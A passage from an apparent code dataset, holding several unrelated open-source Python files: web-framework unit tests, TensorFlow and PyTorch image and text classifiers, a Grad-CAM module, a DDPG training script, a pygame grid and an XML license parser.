proto_factory.assert_called_with(app)\n\n\ndef test_create_server_default_params(app, event_loop, unused_tcp_port):\n \"\"\" Test if the application creates a server coroutine \"\"\"\n from asyncio.base_events import Server\n asyncio.set_event_loop(event_loop)\n server = app.create_server(port=unused_tcp_port, host='localhost')\n assert isinstance(server, Server)\n assert server._loop is event_loop\n\n # create_server_call = mock.call(mock.ANY, port=1)\n # assert mock_event_loop.create_server.mock_calls[0] == create_server_call\n\n # run_until_complete_call = mock.call(mock_event_loop.create_server.return_value)\n # assert mock_event_loop.run_until_complete.mock_calls[0] == run_until_complete_call\n\n\ndef test_create_server_and_run_forever(app):\n mock_protocol_factory = mock.Mock()\n mock_event_loop = mock.MagicMock()\n mock_server_coro = mock.Mock()\n mock_event_loop.create_server.return_value = mock_server_coro\n\n host = mock.Mock()\n port = mock.Mock()\n app.create_server_and_run_forever(loop=mock_event_loop,\n protocol_factory=mock_protocol_factory,\n host=host,\n port=port)\n\n mock_protocol_factory.assert_called_once_with(app)\n mock_event_loop.create_server.assert_called_with(mock_protocol_factory.return_value,\n host=host,\n port=port)\n mock_event_loop.run_forever.assert_called_once()\n mock_event_loop.run_until_complete.assert_called_once_with(mock_server_coro)\n\n\ndef test_create_server_and_run_forever_default_params(app):\n \"\"\" Test if the application creates a server \"\"\"\n import asyncio\n\n mock_event_loop = mock.Mock(spec=asyncio.AbstractEventLoop)\n\n # solves a coverage problem\n mock_event_loop.run_forever.side_effect = KeyboardInterrupt\n\n asyncio.set_event_loop(mock_event_loop)\n\n mock_server = mock.Mock()\n mock_event_loop.create_server = mock.MagicMock(return_value=mock_server)\n\n protocol_path = \"growler.aio.GrowlerHTTPProtocol.get_factory\"\n with mock.patch(protocol_path) as mock_get_factory:\n noval = app.create_server_and_run_forever(host='◉', port=1)\n\n assert noval is None\n mock_event_loop.create_server.assert_called_once_with(mock_get_factory.return_value,\n host='◉',\n port=1)\n mock_event_loop.run_until_complete.assert_called_once_with(mock_server)\n mock_event_loop.run_forever.assert_called_with()\n\n\n# @pytest.mark.parametrize(\"method\", [\n# 'get',\n# 'post',\n# 'all',\n# ])\n# def test_forwards_methods(app, mock_router, method):\n# do_something = mock.Mock()\n# app_method = getattr(app, method)\n# app_method('/', do_something)\n#\n# mock_router_m = getattr(router, method)\n# mock_router_m.assert_called_with('/', do_something)\n\n\n# def test_calling_use(app, mock_router):\n# do_something = mock.Mock(spec=types.FunctionType)\n# do_something_else = mock.Mock(spec=types.FunctionType)\n# app.use(do_something).use(do_something_else)\n# assert len(app.middleware) is 2\n\n\n@pytest.fixture\ndef mock_route_generator():\n return lambda: mock.create_autospec(lambda rq, rs: None)\n\ndef test_fixture_mock_event_loop(mock_event_loop):\n assert isinstance(mock_event_loop, asyncio.AbstractEventLoop)\n\ndef test_fixture_app(app: Application, mock_event_loop):\n assert isinstance(app, Application)\n assert len(app.middleware.mw_list) is 0\n\n\ndef test_router_property(app):\n app.router\n assert len(app.middleware.mw_list) is 1\n\n\n# def test_use_with_routified_obj(app, mock_router):\n# obj = mock.Mock()\n# obj.__growler_router = mock.NonCallableMock()\n# app.use(obj)\n# mock_router.add_router.assert_called_with(None, obj.__growler_router)\n\n\n# def xtest_use_with_routified_class(app, mock_router):\n# sub_router = mock.Mock()\n# obj = mock.MagicMock()\n# obj.__growler_router.return_value = sub_router\n# obj.__growler_router.__class__ = types.MethodType\n# app.use(obj)\n# mock_router.add_router.assert_called_with(None, sub_router)\n# obj.__growler_router.assert_called()\n\n\ndef test_enable(app):\n app.enable('option')\n assert app.enabled('option')\n\n\ndef test_enabled(app):\n app.enable('option')\n assert app.enabled('opti') is None\n\n\ndef test_disable(app):\n app.enable('option')\n app.disable('option')\n assert not app.enabled('option')\n\n\ndef test_set_get_del_in_config_item(app):\n obj = mock.MagicMock()\n app['obj'] = obj\n assert app['obj'] is obj\n assert 'obj' in app\n del app['obj']\n assert 'obj' not in app\n\n\n@pytest.mark.asyncio\nasync def test_default_error_handler_gets_called(app, req, res):\n\n ex = Exception(\"boom\")\n m_handler = app.default_error_handler = mock.MagicMock()\n @app.use # (mock.MagicMock(side_effect=Exception(\"boom\")))\n def bad_mw(req, res):\n raise ex\n\n app.print_middleware_tree()\n await app.handle_client_request(req, res)\n assert m_handler.called\n m_handler.assert_called_with(req, res, ex)\n\n\ndef test_default_error_handler_sends_res(app, req, res):\n ex = Exception(\"boom\")\n app.default_error_handler(req, res, ex)\n assert res.send_html.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_coro(app, req, res):\n m = mock.Mock()\n coro = types.coroutine(lambda req, res: m())\n app.use(coro)\n await app.handle_client_request(req, res)\n assert m.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_exception(app, req, res, mock_route_generator):\n generator = mock.MagicMock()\n handler = mock.MagicMock()\n middleware = mock.Mock(return_value=generator)\n app.middleware = middleware\n\n async def handle_server_err(*args):\n handler(*args)\n\n app.handle_server_error = handle_server_err\n\n ex = Exception(\"boom\")\n m1 = mock_route_generator()\n m1.side_effect = ex\n\n generator.__iter__.return_value = [m1]\n\n await app.handle_client_request(req, res)\n\n assert generator.throw.called\n assert len(handler.mock_calls) is 1\n handler.assert_called_with(req, res, generator, ex)\n\n\n@pytest.mark.asyncio\nasync def test_handle_client_request_nosend(app, req, res, mock_route_generator):\n res.has_ended = False\n\n generator = mock.MagicMock()\n generator.__iter__.return_value = []\n middleware = mock.Mock(return_value=generator)\n app.middleware = middleware\n\n await app.handle_client_request(req, res)\n assert res.send_html.called\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('req_uri, middlewares, called', [\n ('/', [], True),\n # ('/aaa', [], False),\n])\nasync def test_handle_client_request_get(app, req, res, middlewares, called, mock_route_generator):\n m1 = mock_route_generator()\n app.use(m1)\n await app.handle_client_request(req, res)\n assert m1.called is called\n\n\n@pytest.mark.asyncio\nasync def test_handle_header_expect(mock_transport):\n from asyncio import sleep\n from growler.aio import GrowlerHTTPProtocol\n\n app = Application(__name__)\n\n payload = b'123abc'\n http_req = (\"POST / HTTP/1.1\\nHost: test\\nExpect: 100-continue\\n\"\n f\"content-length: {len(payload)}\\n\\n\").encode() + payload\n\n protocol = GrowlerHTTPProtocol(app)\n protocol.connection_made(mock_transport)\n\n responder = protocol.responders[0]\n protocol.data_received(http_req)\n req = responder.req\n res = responder.res\n\n assert 'EXPECT' in req.headers\n assert not res.has_sent_continue\n\n # allow event loop to move to app.handle_client_request\n await sleep(0)\n\n assert res.has_sent_continue\n assert mock_transport.write.mock_calls[0] == mock.call(b'HTTP/1.1 100 Continue\\r\\n\\r\\n')\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_stop_iteration(app, req, res):\n async def do_something(req, res):\n return None\n\n def mock_function():\n # this coroutine required to let test pass - unknown why\n # return asyncio.coroutine(mock.create_autospec(do_something))\n return mock.create_autospec(do_something)\n\n m1 = mock_function()\n m2 = mock_function()\n\n m1.side_effect = GrowlerStopIteration\n\n app.use(m1)\n app.use(m2)\n\n await app.handle_client_request(req, res)\n\n assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_res(app, req, res):\n res.has_ended = False\n\n def set_has_ended(Q, S):\n res.has_ended = True\n\n m1 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__)\n m2 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__,\n side_effect=set_has_ended)\n m3 = mock.MagicMock(spec=set_has_ended,\n __name__='set_has_ended',\n __qualname__='set_has_ended',\n __annotations__={},\n __code__=set_has_ended.__code__)\n\n app.use(m1)\n app.use(m2)\n app.use(m3)\n\n await app.handle_client_request(req, res)\n\n assert m1.called\n assert m2.called\n assert not m3.called\n\n\n@pytest.mark.asyncio\nasync def test_middleware_stops_with_growlerstopiter(app, req, res):\n res.has_ended = False\n\n m0 = mock.MagicMock()\n m1 = mock.MagicMock()\n\n @app.use\n def passes(req, res):\n m0(req, res)\n\n @app.use\n def stop_iter(req, res):\n raise GrowlerStopIteration\n\n @app.use\n def passes_again(req, res):\n m1(req, res)\n\n await app.handle_client_request(req, res)\n\n m0.assert_called_with(req, res)\n m1.assert_not_called\n assert res.has_ended == False\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error(app, req, res):\n m1 = mock.create_autospec(lambda rq, rs, er: None)\n m2 = mock.create_autospec(lambda rq, rs, er: None)\n def set_has_ended(Q, S, E):\n res.has_ended = True\n\n m1.side_effect = set_has_ended\n generator = mock.MagicMock()\n generator.__iter__.return_value = [m1, m2]\n err = mock.MagicMock()\n\n await app.handle_server_error(req, res, generator, err)\n assert m1.called\n assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_awaitable(app, req, res):\n res.has_ended = False\n ex = Exception(\"Boom\")\n m0 = mock.MagicMock()\n eh = mock.MagicMock()\n m1 = mock.MagicMock()\n\n def m_call(m):\n return lambda req, res: m(req, res)\n\n async def ehandle(req, res, err):\n eh(req, res, err)\n assert err is None\n\n async def oops(req, res):\n raise ex\n\n app.use(m_call(m0))\n app.use(ehandle)\n e = app.middleware.mw_list[-1]\n\n app.use(m_call(m1))\n app.use(oops)\n app.print_middleware_tree()\n await app.handle_client_request(req, res)\n\n m0.assert_called_with(req, res)\n m1.assert_called_with(req, res)\n eh.assert_called_with(req, res, ex)\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_sends_status_500(app, req, res):\n ex = Exception(\"Boom!\")\n gen = mock.MagicMock()\n\n @app.use\n def raises_err(rq, rs):\n gen(rq, rs)\n raise ex\n\n await app.handle_client_request(req, res)\n gen.assert_called_once_with(req, res)\n args = res.send_html.call_args[0]\n assert args[1] == 500\n assert '500 -' in args[0]\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('count, passes', [\n (0, True),\n (Application.error_recursion_max_depth-1, True),\n (Application.error_recursion_max_depth, False),\n (Application.error_recursion_max_depth+2, False),\n])\nasync def test_handle_server_error_max_depth(app, req, res, count, passes):\n generator = mock.MagicMock()\n generator.__iter__.return_value = []\n err = mock.MagicMock()\n\n if passes:\n await app.handle_server_error(req, res, generator, err, count)\n else:\n with pytest.raises(Exception):\n await app.handle_server_error(req, res, generator, err, count)\n\n\n@pytest.mark.asyncio\nasync def test_handle_server_error_in_error(app, req, res):\n generator = mock.MagicMock()\n m1 = mock.create_autospec(lambda rq, rs, er: None)\n m2 = mock.create_autospec(lambda rq, rs, er: None)\n\n def reset_iteration(Q, S, E):\n generator.__iter__.return_value = []\n raise ex\n\n ex = Exception(\"boom\")\n m1.side_effect = reset_iteration\n\n generator.__iter__.return_value = [m1, m2]\n err = mock.MagicMock()\n\n await app.handle_server_error(req, res, generator, err)\n\n assert m1.called\n assert not m2.called\n\n\n@pytest.mark.asyncio\nasync def test_response_not_sent(app, req, res):\n req.method = 0b000001\n req.path = '/'\n res.has_ended = False\n\n def send_req(rq, rs):\n rs.has_ended = True\n\n foo = mock.Mock(_is_coroutine=False, side_effect=send_req)\n app.get(\"/foo\", foo)\n bar = mock.Mock(_is_coroutine=False, side_effect=send_req)\n app.get(\"/bar\", bar)\n app.handle_response_not_sent = mock.Mock()\n await app.handle_client_request(req, res)\n foo.assert_not_called\n bar.assert_not_called\n app.handle_response_not_sent.assert_called_with(req, res)\n","repo_name":"pyGrowler/Growler","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":20568,"program_lang":"python","lang":"en","doc_type":"code","stars":688,"dataset":"github-code","pt":"78"} +{"seq_id":"8589871378","text":"import tensorflow as tf\nimport tflearn\n\n\nclass TextImgCNN(object):\n\n def __init__(self, sequence_length, num_classes, vocab_size,\n embedding_size, filter_sizes, num_filters, output_image_width, encoding_height,\n l2_reg_lambda=0.0):\n\n # Placeholders for input, output and dropout\n self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name='input_x')\n self.input_mask = tf.placeholder(tf.float32, [None, output_image_width, output_image_width, 3], name='input_mask')\n self.input_y = tf.placeholder(tf.float32, [None, num_classes], name='input_y')\n self.dropout_keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')\n\n # resize images\n # size: [new_height, new_width] is The new size for the images.\n resized_images = tf.image.resize_images(self.input_mask, [output_image_width - encoding_height, output_image_width])\n\n l2_loss = tf.constant(0.0)\n\n # Embedding layer\n with tf.name_scope('embedding'):\n self.W = tf.Variable(\n tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),\n name='W')\n self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)\n\n # Create a convolution + maxpool layer for each filter size\n pooled_outputs = []\n for i, filter_size in enumerate(filter_sizes):\n with tf.name_scope('conv-maxpool-%s' % filter_size):\n # Convolution Layer\n filter_shape = [filter_size, embedding_size, 1, num_filters]\n W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='W')\n b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name='b')\n conv = tf.nn.conv2d(\n self.embedded_chars_expanded,\n W,\n strides=[1, 1, 1, 1],\n padding='VALID',\n name='conv')\n # Apply nonlinearity\n h = tf.nn.relu(tf.nn.bias_add(conv, b))\n # Maxpooling over the outputs\n pooled = tf.nn.max_pool(\n h,\n ksize=[1, sequence_length - filter_size + 1, 1, 1],\n strides=[1, 1, 1, 1],\n padding='VALID',\n name='pool')\n pooled_outputs.append(pooled)\n\n # Combine all the pooled features\n num_filters_total = num_filters * len(filter_sizes)\n self.h_pool = tf.concat(pooled_outputs, 3)\n\n self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])\n\n with tf.name_scope('fc1-text'):\n fc1_size = encoding_height * output_image_width * 3\n fc_w1 = tf.Variable(tf.random_normal([num_filters_total, fc1_size]))\n bd1 = tf.Variable(tf.random_normal([fc1_size]))\n fc1 = tf.add(tf.matmul(self.h_pool_flat, fc_w1), bd1)\n fc1 = tf.nn.sigmoid(fc1)\n\n self.reshaped_layer = tflearn.reshape(fc1, new_shape=[-1, encoding_height, output_image_width, 3], name='encoded_text')\n\n self.sum = tf.concat([self.reshaped_layer, resized_images], 1, name='sum')\n self.h_pool_flat_2 = tf.reshape(self.sum, [-1, output_image_width * output_image_width * 3])\n\n with tf.name_scope('dropout'):\n self.h_drop = tf.nn.dropout(self.h_pool_flat_2, self.dropout_keep_prob)\n\n with tf.name_scope('output'):\n W = tf.get_variable(\n 'W',\n shape=[output_image_width * output_image_width * 3, num_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name='b')\n l2_loss += tf.nn.l2_loss(W)\n l2_loss += tf.nn.l2_loss(b)\n self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name='scores')\n self.predictions = tf.argmax(self.scores, 1, name='predictions')\n\n with tf.name_scope('loss'):\n losses = tf.nn.softmax_cross_entropy_with_logits_v2(logits=self.scores, labels=self.input_y)\n self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss\n\n with tf.name_scope('accuracy'):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, 'float'), name='accuracy')\n\n","repo_name":"artelab/Multi-modal-classification","sub_path":"model/TextImgCNN.py","file_name":"TextImgCNN.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"25114592495","text":"import pygame\nfrom settings import *\nimport math\nimport numpy as np\nfrom utils import *\n\nclass Field:\n class Cell:\n def __init__(self, x, y, size):\n self.x = x\n self.y = y\n self.size = size\n self.rect = pygame.Rect(x, y, size, size)\n self.density = 0\n self.velocity = np.array([0,0])\n self.index = 0\n\n def __init__(self, env, step):\n self.step = step\n self.env = env\n self.cells = [[self.Cell(x, y, self.step) for x in range(0, WIDTH, self.step)] for y in range(0, HEIGHT, self.step)]\n print (\"created field: {} x {}\".format(len(self.cells[0]), len(self.cells)))\n\n def draw(self):\n for row in self.cells:\n for cell in row:\n pygame.draw.rect(self.env.WIN, (255, 255, 255), cell.rect, 1)\n\n def update(self):\n self.cells = [[self.Cell(x, y, self.step) for x in range(0, WIDTH, self.step)] for y in range(0, HEIGHT, self.step)]\n\n for i, row in enumerate(self.cells):\n for j, cell in enumerate(row):\n cell.velocity[0] = i\n cell.velocity[1] = j * math.sin(j)\n\n\n if DRAW_GRID: self.draw()","repo_name":"SlothRoss/physics","sub_path":"VectorField/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28990686189","text":"# Nicholas Pagliocca\r\n# DDPG implementation using the fork from OpenAI baselines called Stable baselines\r\n\r\nimport gym\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom stable_baselines.ddpg.policies import MlpPolicy\r\nfrom stable_baselines.common.noise import OrnsteinUhlenbeckActionNoise\r\nfrom stable_baselines import DDPG\r\n\r\nwith open(\"Output_data_analytical.csv\", \"w\") as out_file:\r\n out_String = str( \"L1,L1_p,L1_2p,L2,L1_2p,L2_3p,b1,L2_pb2,h,Y01,Y02,Y03,Reward\")\r\n out_file.write(out_String + '\\n')\r\n\r\ni = 0\r\n\r\nwhile True:\r\n i = i+1\r\n df = pd.read_csv('Output_data_analytical.csv')\r\n\r\n max_disp = df['Reward'].max()\r\n\r\n if i > 2:\r\n\r\n last_val = df['Reward'].iloc[-1]\r\n n_last = last_val\r\n print(n_last)\r\n if last_val >= max_disp:\r\n i = 5\r\n print(i)\r\n print(max_disp)\r\n\r\n env = gym.make('Threechambera-v0')\r\n\r\n # the noise objects for DDPG\r\n n_actions = env.action_space.shape[-1]\r\n param_noise = None\r\n action_noise = OrnsteinUhlenbeckActionNoise(mean=np.zeros(n_actions), sigma=float(0.5) * np.ones(n_actions))\r\n\r\n model = DDPG(MlpPolicy, env, verbose=1, param_noise=param_noise, action_noise=action_noise, batch_size=8)\r\n model.learn(total_timesteps=500)\r\n model.save(\"test_analytical\")\r\n\r\n #del model # remove to demonstrate saving and loading\r\n\r\n model = DDPG.load(\"test_analytical\")\r\n count = 0\r\n obs = env.reset()\r\n while True:\r\n action, _states = model.predict(obs)\r\n obs, rewards, dones, info = env.step(action)\r\n count = count +1\r\n break\r\n if i == 5:\r\n break\r\n\r\n\r\n\r\n","repo_name":"Trkov-Research-Group/MDOF-soft-actuator-optimzation","sub_path":"Model-based-optimization/Model-based-DDPG/DDPG_Analytical_model_implementation.py","file_name":"DDPG_Analytical_model_implementation.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18345567947","text":"import xml.etree.ElementTree as ET\n\nclass LicensesEntry:\n type: str\n feature_description: str\n expiry_date: str\n warning: str\n name: None\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = LicensesEntry()\n data.type = node.findtext('type')\n data.feature_description = node.findtext('feature-description')\n data.expiry_date = node.findtext('expiry-date')\n data.warning = node.findtext('warning')\n data.name = node.attrib.get('name')\n return data\n\n def to_dict(self):\n return {\n 'type': self.type,\n 'feature_description': self.feature_description,\n 'expiry_date': self.expiry_date,\n 'warning': self.warning,\n 'name': self.name,\n }\n\nclass Licenses:\n licenses_entry: list[LicensesEntry]\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Licenses()\n data.licenses_entry = [LicensesEntry.from_xml(i) for i in node.findall(\"entry\")]\n return data\n\n def to_dict(self):\n return {\n 'licenses_entry': [i.to_dict() for i in self.licenses_entry],\n }\n\nclass Entry:\n serial_no: str\n devicename: str\n licenses: Licenses\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Entry()\n data.serial_no = node.findtext('serial-no')\n data.devicename = node.findtext('devicename')\n data.licenses = Licenses.from_xml(node.find(\"licenses\"))\n return data\n\n def to_dict(self):\n return {\n 'serial_no': self.serial_no,\n 'devicename': self.devicename,\n 'licenses': self.licenses.to_dict() if isinstance(self.licenses, Licenses) else None,\n }\n\nclass Devices:\n entry: list[Entry]\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Devices()\n data.entry = [Entry.from_xml(i) for i in node.findall(\"entry\")]\n return data\n\n def to_dict(self):\n return {\n 'entry': [i.to_dict() for i in self.entry],\n }\n\nclass Result:\n devices: Devices\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Result()\n data.devices = Devices.from_xml(node.find(\"devices\"))\n return data\n\n def to_dict(self):\n return {\n 'devices': self.devices.to_dict() if isinstance(self.devices, Devices) else None,\n }\n\nclass Response:\n result: Result\n status: None\n\n @staticmethod\n def from_string(xml: str):\n return Response.from_xml(ET.fromstring(xml))\n\n @staticmethod\n def from_file(xml: str):\n return Response.from_xml(ET.parse(xml).getroot())\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Response()\n data.result = Result.from_xml(node.find(\"result\"))\n data.status = node.attrib.get('status')\n return data\n\n def to_dict(self):\n return {\n 'result': self.result.to_dict() if isinstance(self.result, Result) else None,\n 'status': self.status,\n }\n\n","repo_name":"vinicius-junio/panorama-firewall-versions","sub_path":"licenses.py","file_name":"licenses.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37231347788","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 02:52:14 2020\r\n\r\n@author: pbamo\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import transforms\r\nimport torchvision.models as models\r\nfrom torchvision.datasets import ImageFolder\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom run_q6_1 import test, train\r\nimport multiprocessing\r\n\r\n\r\nclass Scratch(nn.Module):\r\n def __init__(self):\r\n super(Scratch, self).__init__()\r\n self.conv_1 = nn.Conv2d(3, 10, kernel_size=5)\r\n self.conv_2 = nn.Conv2d(10, 20, kernel_size=3)\r\n self.conv_3 = nn.Conv2d(20, 40, kernel_size=3)\r\n self.fully_connect_1 = nn.Linear(27040, 256)\r\n self.fully_connect_2 = nn.Linear(256, 17)\r\n\r\n def forward(self, x):\r\n x = F.relu(F.max_pool2d(self.conv_1(x), 2))\r\n x = F.relu(F.max_pool2d(self.conv_2(x), 2))\r\n x = F.relu(F.max_pool2d(self.conv_3(x), 2))\r\n x = x.view(-1, 27040)\r\n x = F.relu(self.fully_connect_1(x))\r\n x = F.dropout(x, training=self.training)\r\n x = self.fully_connect_2(x)\r\n result = F.log_softmax(x, dim=1)\r\n return result\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # Parsing arguments\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR')\r\n parser.add_argument('--batch-size', type=int, default=32, metavar='N')\r\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N')\r\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M')\r\n parser.add_argument('--no-cuda', action='store_true', default=False)\r\n parser.add_argument('--log-interval', type=int, default=10, metavar='N')\r\n parser.add_argument('--seed', type=int, default=1, metavar='S')\r\n \r\n args = parser.parse_args()\r\n \r\n use_cuda = not args.no_cuda and torch.cuda.is_available()\r\n torch.manual_seed(args.seed)\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n kwargs = {'num_workers': multiprocessing.cpu_count(), 'pin_memory': True} if use_cuda else {}\r\n max_iters = 50\r\n\r\n #Data loading\r\n transform_data = transforms.Compose([transforms.Resize(256),transforms.RandomResizedCrop(224),transforms.ToTensor()])\r\n\r\n train_loader = DataLoader(ImageFolder('../data/oxford-flowers17/train', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n valid_loader = DataLoader(ImageFolder('../data/oxford-flowers17/val', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n test_loader = DataLoader(ImageFolder('../data/oxford-flowers17/test', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n\r\n\r\n\r\n ##### Scratch ######\r\n model = Scratch().to(device)\r\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\r\n\r\n train_loss, train_acc = list(), list()\r\n for i in range(max_iters):\r\n loss, acc = train(args, model, device, train_loader, optimizer, i)\r\n train_loss.append(loss)\r\n train_acc.append(acc)\r\n print('Iteration: {}, Loss: {:.6f}, Accuracy: {:.6f}'.format(i, loss, acc))\r\n test(args, model, device, test_loader)\r\n \r\n x = np.arange(max_iters)\r\n plt.figure('Accuracy')\r\n plt.plot(x, train_acc)\r\n plt.xlabel('Iterations')\r\n plt.ylabel('Accuracy')\r\n plt.title('Accuracy vs Iterations - Scratch')\r\n plt.show()\r\n \r\n \r\n ##### Fine Tuning ######\r\n \r\n model = models.squeezenet1_1(pretrained=True)\r\n # print (model)\r\n num_classes = len(ImageFolder('../data/oxford-flowers17/train', transform = transform_data).classes)\r\n model.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\r\n model.num_classes = num_classes\r\n\r\n model.type(torch.FloatTensor)\r\n cross_loss = nn.CrossEntropyLoss().type(torch.FloatTensor)\r\n\r\n for param in model.parameters():\r\n param.requires_grad = False\r\n for param in model.classifier.parameters():\r\n param.requires_grad = True\r\n\r\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\r\n \r\n train_acc_fine = list()\r\n for i in range(max_iters):\r\n model.train()\r\n for x, y in train_loader:\r\n x_var = Variable(x.type(torch.FloatTensor))\r\n y_var = Variable(y.type(torch.FloatTensor).long())\r\n scores = model(x_var)\r\n loss = cross_loss(scores, y_var)\r\n \r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # Check accuracy on the train and val sets.\r\n model.eval()\r\n match, n_values = 0, 0\r\n for x, y in train_loader:\r\n x_var = Variable(x.type(torch.FloatTensor), volatile=True)\r\n scores = model(x_var)\r\n \r\n no_need, preds = scores.data.cpu().max(1)\r\n match += (preds == y).sum()\r\n n_values += x.size(0)\r\n\r\n train_acc_f = float(match) / n_values\r\n train_acc_fine.append(train_acc_f)\r\n print('Iteration: {}, Train accuracy: {}'.format(i, train_acc_f))\r\n \r\n x = np.arange(max_iters)\r\n plt.figure('Accuracy')\r\n plt.plot(x, train_acc_fine)\r\n plt.xlabel('Iterations')\r\n plt.ylabel('Accuracy')\r\n plt.title('Accuracy vs Iterations - Fine Tuning')\r\n plt.show()\r\n \r\n \r\n model.eval()\r\n match, n_values = 0, 0\r\n for x, y in valid_loader:\r\n x_var = Variable(x.type(torch.FloatTensor), volatile=True)\r\n \r\n scores = model(x_var)\r\n no_need, preds = scores.data.cpu().max(1)\r\n match += (preds == y).sum()\r\n n_values += x.size(0)\r\n\r\n print('Validation accuracy: ', float(match) / n_values)","repo_name":"abhishekbamotra/computer-vision-16-720B","sub_path":"HW5/python/run_q6_2.py","file_name":"run_q6_2.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7062177469","text":"# Ref:- https://medium.com/@stepanulyanin/grad-cam-for-resnet152-network-784a1d65f3\n\n'''\nUsing Layer3 for gradcam (Not Layer4). If need to change layer, modify code accordingly\nthis GradCAM code for resnet18 model only (../models/ResNet_V2_mod.py)\nfor anyother model or layer, modify code e.g. self.features_conv, placement of out.register_hook etc ...\n'''\nimport cv2\nimport numpy\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport torchvision\nimport matplotlib.pyplot as plt\n\n\n\nclass res18_gradcam(nn.Module):\n def __init__(self, net):\n super(res18_gradcam, self).__init__()\n\n self.res18 = net\n\n # disect the network to access its last convolutional layer\n self.features_conv = nn.Sequential(self.res18.conv1,\n self.res18.layer1,\n self.res18.layer2,\n self.res18.layer3\n# self.res18.layer4\n ) # list(self.resx.children())[:-5]\n self.layer4 = self.res18.layer4\n\n self.linear = self.res18.linear\n\n # placeholder for the gradients\n self.gradients = None\n\n # hook for the gradients of the activations\n def activations_hook(self, grad):\n self.gradients = grad\n\n def forward(self, x):\n out = self.features_conv(x)\n\n # register the hook\n h = out.register_hook(self.activations_hook)\n \n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n # method for the gradient extraction\n def get_gradient(self):\n return self.gradients\n\n # method for the activation exctraction\n def get_activations(self, x):\n return self.features_conv(x)\n \ndef heatmap(res18_cam,net,img,device,channels_number=512):\n\n# res18_cam = res18_gradcam(net)\n\n # set the evaluation mode\n _ = res18_cam.eval()\n\n\n # forward pass\n pred = res18_cam(img.to(device))\n\n # Predict class\n class_idx = pred.argmax(dim=1) # e.g. prints tensor([2])\n\n # get the gradient of the output with respect to the parameters of the model\n pred[:, class_idx].backward()\n\n # pull the gradients out of the model\n gradients = res18_cam.get_gradient() # shape=[BN, C , H , W], BN = 1 (always as headmap for single image)\n\n # pool the gradients across the channels\n pooled_gradients = torch.mean(gradients, dim=[0, 2, 3]) # Shape [C]\n\n # get the activations of the last convolutional layer\n activations = res18_cam.get_activations(img.to(device)).detach() # Shape 